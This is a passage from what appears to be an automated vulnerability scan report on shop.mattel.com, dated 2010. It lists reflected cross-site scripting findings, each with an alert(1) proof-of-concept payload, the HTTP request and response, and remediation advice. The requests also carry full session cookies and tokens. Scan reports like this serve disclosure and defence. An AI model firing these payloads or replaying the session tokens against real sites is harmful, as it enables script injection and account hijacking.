Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:02 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 38225


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/
...[SNIP]...
<!-- === Request Query String: da39a--><script>alert(1)</script>877791f5b35=1 -->
...[SNIP]...

1.57. https://shop.mattel.com/brand/index.jsp [categoryId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The value of the categoryId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3ced"-alert(1)-"5910eac9a7a was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/index.jsp?categoryId=3768131c3ced"-alert(1)-"5910eac9a7a HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:57 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31915


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="categoryId=3768131c3ced"-alert(1)-"5910eac9a7a";
   </script>
...[SNIP]...

1.58. https://shop.mattel.com/brand/index.jsp [categoryId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The value of the categoryId request parameter is copied into an HTML comment. The payload 30414--><script>alert(1)</script>ed84d125fcc was submitted in the categoryId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /brand/index.jsp?categoryId=376813130414--><script>alert(1)</script>ed84d125fcc HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:58 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 31947


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<!-- === Request Query String: categoryId=376813130414--><script>alert(1)</script>ed84d125fcc -->
...[SNIP]...

1.59. https://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95e25"-alert(1)-"dca41e50f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /brand/index.jsp?95e25"-alert(1)-"dca41e50f50=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:56 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36543


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="95e25"-alert(1)-"dca41e50f50=1";
   </script>
...[SNIP]...

1.60. https://shop.mattel.com/brand/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /brand/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload fb987--><script>alert(1)</script>1b3aab43a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /brand/index.jsp?fb987--><script>alert(1)</script>1b3aab43a=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:58 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 36581


                                                                                        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<!-- === Request Query String: fb987--><script>alert(1)</script>1b3aab43a=1 -->
...[SNIP]...

1.61. https://shop.mattel.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /checkout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 593fd"-alert(1)-"60a7e7979cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /checkout/index.jsp?process=myaccount&593fd"-alert(1)-"60a7e7979cb=1 HTTP/1.1
Host: shop.mattel.com
Connection: keep-alive
Referer: https://shop.mattel.com/checkout/index.jsp?process=login
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; __g_c=w%3A1%7Cb%3A4%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084615922}; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:43 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="process=myaccount&593fd"-alert(1)-"60a7e7979cb=1";
   </script>
...[SNIP]...

1.62. https://shop.mattel.com/checkout/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /checkout/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d4795--><script>alert(1)</script>7a3578d3d18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /checkout/index.jsp?process=myaccount&d4795--><script>alert(1)</script>7a3578d3d18=1 HTTP/1.1
Host: shop.mattel.com
Connection: keep-alive
Referer: https://shop.mattel.com/checkout/index.jsp?process=login
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; __g_c=w%3A1%7Cb%3A4%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084615922}; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:44 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<!-- === Request Query String: process=myaccount&d4795--><script>alert(1)</script>7a3578d3d18=1 -->
...[SNIP]...

1.63. https://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /emailSignup/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8323d--><script>alert(1)</script>25b88f59a0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /emailSignup/index.jsp?8323d--><script>alert(1)</script>25b88f59a0c=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:58 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control:
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51377


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<!-- === Request Query String: 8323d--><script>alert(1)</script>25b88f59a0c=1 -->
...[SNIP]...

1.64. https://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /emailSignup/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77927"-alert(1)-"63de54cd57b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /emailSignup/index.jsp?77927"-alert(1)-"63de54cd57b=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:11:56 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control:
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 51329


                                                                                    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/
...[SNIP]...
<script type="text/javascript">
   if(ess){}else{
       var ess = {};
   }
   
   
       ess['locale']="es_US";
   
   
           ess['server']="https://shop.mattel.com";
    ess['qs']="77927"-alert(1)-"63de54cd57b=1";
   </script>
...[SNIP]...

1.65. https://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /giftCertificates/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7155e--><script>alert(1)</script>64bb62cd0af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /giftCertificates/index.jsp?7155e--><script>alert(1)</script>64bb62cd0af=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:12:03 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 43920


        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
<!-- === Request Query String: productId=3738867&7155e--><script>alert(1)</script>64bb62cd0af=1 -->
...[SNIP]...

1.66. https://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /giftCertificates/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e95e4"-alert(1)-"ba8774a4224 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /giftCertificates/index.jsp?e95e4"-alert(1)-"ba8774a4224=1 HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
